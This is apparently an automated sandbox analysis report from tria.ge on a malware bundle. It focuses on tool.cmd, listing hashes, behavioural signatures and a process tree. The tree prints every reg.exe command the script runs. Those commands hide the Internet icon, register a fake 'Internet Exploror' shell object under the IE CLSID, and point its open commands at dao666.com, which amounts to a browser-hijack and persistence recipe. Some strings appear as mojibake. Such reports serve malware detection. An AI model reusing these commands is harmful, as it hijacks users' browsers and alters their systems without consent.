Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
8Static
static
1360.cmd
windows7-x64
4360.cmd
windows10-2004-x64
4360SE.vbs
windows7-x64
3360SE.vbs
windows10-2004-x64
7361.cmd
windows7-x64
1361.cmd
windows10-2004-x64
136OSE.vbs
windows7-x64
636OSE.vbs
windows10-2004-x64
736O安全�... 3.lnk
windows7-x64
336O安全�... 3.lnk
windows10-2004-x64
336O安全�...�3.lnk
windows7-x64
336O安全�...�3.lnk
windows10-2004-x64
3Internet Exploror.lnk
windows7-x64
3Internet Exploror.lnk
windows10-2004-x64
3copy.cmd
windows7-x64
8copy.cmd
windows10-2004-x64
8cpa.cmd
windows7-x64
7cpa.cmd
windows10-2004-x64
1ha.vbs
windows7-x64
3ha.vbs
windows10-2004-x64
8is.cmd
windows7-x64
1is.cmd
windows10-2004-x64
1runonce.cmd
windows7-x64
8runonce.cmd
windows10-2004-x64
8tool.cmd
windows7-x64
7tool.cmd
windows10-2004-x64
7winare.vbs
windows7-x64
1winare.vbs
windows10-2004-x64
1Analysis
-
max time kernel
119s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 17:54
Static task
static1
Behavioral task
behavioral1
Sample
360.cmd
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
360.cmd
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
360SE.vbs
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
360SE.vbs
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
361.cmd
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
361.cmd
Resource
win10v2004-20231222-en
Behavioral task
behavioral7
Sample
36OSE.vbs
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
36OSE.vbs
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
36O安全刘览器 3.lnk
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
36O安全刘览器 3.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
36O安全刘览器3.lnk
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
36O安全刘览器3.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
Internet Exploror.lnk
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
Internet Exploror.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
copy.cmd
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
copy.cmd
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
cpa.cmd
Resource
win7-20231129-en
Behavioral task
behavioral18
Sample
cpa.cmd
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
ha.vbs
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
ha.vbs
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
is.cmd
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
is.cmd
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
runonce.cmd
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
runonce.cmd
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
tool.cmd
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
tool.cmd
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
winare.vbs
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
winare.vbs
Resource
win10v2004-20231215-en
General
-
Target
tool.cmd
-
Size
3KB
-
MD5
d7eece295819ac643894e11ec290fc16
-
SHA1
eaf976563ab1d54ddbb538846f21d80663c0482b
-
SHA256
00057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef
-
SHA512
61602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\system32\\shdocvw.dll" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ reg.exe -
Modifies registry class 44 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\system32\\shdocvw.dll" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1692 wrote to memory of 2104 1692 cmd.exe 29 PID 1692 wrote to memory of 2104 1692 cmd.exe 29 PID 1692 wrote to memory of 2104 1692 cmd.exe 29 PID 1692 wrote to memory of 3032 1692 cmd.exe 30 PID 1692 wrote to memory of 3032 1692 cmd.exe 30 PID 1692 wrote to memory of 3032 1692 cmd.exe 30 PID 1692 wrote to memory of 2052 1692 cmd.exe 31 PID 1692 wrote to memory of 2052 1692 cmd.exe 31 PID 1692 wrote to memory of 2052 1692 cmd.exe 31 PID 1692 wrote to memory of 2704 1692 cmd.exe 32 PID 1692 wrote to memory of 2704 1692 cmd.exe 32 PID 1692 wrote to memory of 2704 1692 cmd.exe 32 PID 1692 wrote to memory of 1724 1692 cmd.exe 33 PID 1692 wrote to memory of 1724 1692 cmd.exe 33 PID 1692 wrote to memory of 1724 1692 cmd.exe 33 PID 1692 wrote to memory of 2080 1692 cmd.exe 34 PID 1692 wrote to memory of 2080 1692 cmd.exe 34 PID 1692 wrote to memory of 2080 1692 cmd.exe 34 PID 1692 wrote to memory of 1640 1692 cmd.exe 35 PID 1692 wrote to memory of 1640 1692 cmd.exe 35 PID 1692 wrote to memory of 1640 1692 cmd.exe 35 PID 1692 wrote to memory of 2744 1692 cmd.exe 36 PID 1692 wrote to memory of 2744 1692 cmd.exe 36 PID 1692 wrote to memory of 2744 1692 cmd.exe 36 PID 1692 wrote to memory of 2804 1692 cmd.exe 37 PID 1692 wrote to memory of 2804 1692 cmd.exe 37 PID 1692 wrote to memory of 2804 1692 cmd.exe 37 PID 1692 wrote to memory of 2820 1692 cmd.exe 38 PID 1692 wrote to memory of 2820 1692 cmd.exe 38 PID 1692 wrote to memory of 2820 1692 cmd.exe 38 PID 1692 wrote to memory of 2824 1692 cmd.exe 39 PID 1692 wrote to memory of 2824 1692 cmd.exe 39 PID 1692 wrote to memory of 2824 1692 cmd.exe 39 PID 1692 wrote to memory of 2836 1692 cmd.exe 40 PID 1692 wrote to memory of 2836 1692 cmd.exe 40 PID 1692 wrote to memory of 2836 1692 cmd.exe 40 PID 1692 wrote to memory of 2860 1692 cmd.exe 41 PID 1692 wrote to memory of 2860 1692 cmd.exe 41 PID 1692 wrote to memory of 2860 1692 cmd.exe 41 PID 1692 wrote to memory of 2808 1692 cmd.exe 42 PID 1692 wrote to memory of 2808 1692 cmd.exe 42 PID 1692 wrote to memory of 2808 1692 cmd.exe 42 PID 1692 wrote to memory of 2772 1692 cmd.exe 43 PID 1692 wrote to memory of 2772 1692 cmd.exe 43 PID 1692 wrote to memory of 2772 1692 cmd.exe 43 PID 1692 wrote to memory of 2388 1692 cmd.exe 46 PID 1692 wrote to memory of 2388 1692 cmd.exe 46 PID 1692 wrote to memory of 2388 1692 cmd.exe 46 PID 1692 wrote to memory of 2944 1692 cmd.exe 45 PID 1692 wrote to memory of 2944 1692 cmd.exe 45 PID 1692 wrote to memory of 2944 1692 cmd.exe 45 PID 1692 wrote to memory of 2740 1692 cmd.exe 44 PID 1692 wrote to memory of 2740 1692 cmd.exe 44 PID 1692 wrote to memory of 2740 1692 cmd.exe 44 PID 1692 wrote to memory of 2884 1692 cmd.exe 47 PID 1692 wrote to memory of 2884 1692 cmd.exe 47 PID 1692 wrote to memory of 2884 1692 cmd.exe 47 PID 1692 wrote to memory of 2432 1692 cmd.exe 49 PID 1692 wrote to memory of 2432 1692 cmd.exe 49 PID 1692 wrote to memory of 2432 1692 cmd.exe 49 PID 1692 wrote to memory of 2844 1692 cmd.exe 48 PID 1692 wrote to memory of 2844 1692 cmd.exe 48 PID 1692 wrote to memory of 2844 1692 cmd.exe 48 PID 1692 wrote to memory of 2852 1692 cmd.exe 50
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tool.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f2⤵PID:2104
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"2⤵
- Modifies registry class
PID:3032
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f2⤵
- Modifies registry class
PID:2052
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f2⤵
- Modifies registry class
PID:2704
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"2⤵
- Modifies registry class
PID:1724
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f2⤵
- Modifies registry class
PID:2080
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"2⤵
- Registers COM server for autorun
- Modifies registry class
PID:1640
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f2⤵
- Registers COM server for autorun
- Modifies registry class
PID:2744
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f2⤵
- Registers COM server for autorun
- Modifies registry class
PID:2804
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"2⤵
- Modifies registry class
PID:2820
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f2⤵
- Modifies registry class
PID:2824
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"2⤵
- Modifies registry class
PID:2836
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f2⤵
- Modifies registry class
PID:2860
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"2⤵
- Modifies registry class
PID:2808
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f2⤵
- Modifies registry class
PID:2772
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f2⤵
- Modifies registry class
PID:2740
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"2⤵
- Modifies registry class
PID:2944
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"2⤵
- Modifies registry class
PID:2388
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"2⤵
- Modifies registry class
PID:2884
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f2⤵
- Modifies registry class
PID:2844
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f2⤵
- Modifies registry class
PID:2432
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f2⤵
- Modifies registry class
PID:2852
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f2⤵
- Modifies registry class
PID:2732
-